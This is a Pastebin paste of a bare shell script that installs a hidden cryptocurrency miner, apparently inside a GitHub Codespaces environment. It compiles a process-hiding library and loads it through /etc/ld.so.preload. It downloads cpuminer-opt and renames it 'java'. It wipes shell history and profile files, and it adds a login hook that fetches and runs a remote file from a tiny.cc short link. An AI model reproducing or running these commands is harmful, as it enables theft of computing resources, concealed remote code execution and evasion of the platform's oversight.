Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- rm -rvf .lib* .bash*
- cd ~/
- wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
- unzip tukimin.zip
- rm -rf tukimin.zip
- make
- gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
- mv libprocesshider.so /usr/local/lib/
- echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
- clear
- mkdir .lib
- cd .lib
- git clone https://github.com/sukamenari/akc.git && cd akc && rm bash && wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.29/cpuminer-opt-linux.tar.gz --no-check-certificate && tar xf cpuminer-opt-linux.tar.gz && rm cpuminer-opt-linux.tar.gz && mv cpuminer-avx2 java && mv java* ~/ && cd .. && rm -rvf cpuminer-opt-linux && mv kernel* /home/codespace/.lib
- cd .. && rm -rvf akc
- echo "" > /home/codespace/.bashrc
- echo "" > /home/codespace/.bash_history
- echo "" > /home/codespace/.bash_profile
- echo 'echo "" >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
- echo "source /home/codespace/.bash_profile" >> /home/codespace/.bashrc
- echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
- echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
- echo "bash /home/codespace/.lib/gas.sh" >> /home/codespace/.bash_profile &&
- echo "export LC_ALL=C; unset LANGUAGE && cd ~/ && rm -rvf e && wget -O e http://tiny.cc/Cbte2 && chmod +x e && ./e " > /home/codespace/.lib/gas.sh
- cd /home/codespace/.lib/
- chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement